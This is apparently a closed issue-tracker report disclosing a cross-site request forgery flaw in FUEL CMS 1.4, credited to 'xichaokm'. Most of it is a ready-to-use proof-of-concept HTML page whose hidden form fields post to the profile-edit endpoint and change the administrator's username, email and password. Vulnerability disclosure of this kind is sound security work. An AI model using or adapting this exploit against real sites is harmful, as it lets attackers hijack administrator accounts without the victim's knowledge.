Closed
Description
Cross-site request forgery (CSRF) vulnerability in "http://127.0.0.1/fuel/my_profile/edit?inline=" in FUELCMS 1.4 allows remote attackers to hijack the authentication of unspecified users for requests that change administrator's password
Author:xichaokm
poc:
<span style="font-size:18px;"><!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF</title>
</head>
<form action="http://127.0.0.1/fuel/my_profile/edit?inline=" method="POST">
<input type="hidden" name="user_name" value="hacker"><!--admin's name-->
<input type="hidden" name="email" value="test@mail.com"><!--admin's email-->
<input type="hidden" name="first_name" value="admin">
<input type="hidden" name="last_name" value="admin">
<input type="hidden" name="new_password" value="xichao"><!--admin's password-->
<input type="hidden" name="confirm_password" value="xichao"><!--admin's password-->
<input type="hidden" name="Save" value="Save">
<input type="hidden" name="language" value="english">
<input type="hidden" name="fuel_inline" value="0">
<button type="submit" value="Submit">GO</button>
</form>
</body>
</html></span>
Metadata
Metadata
Assignees
Labels
No labels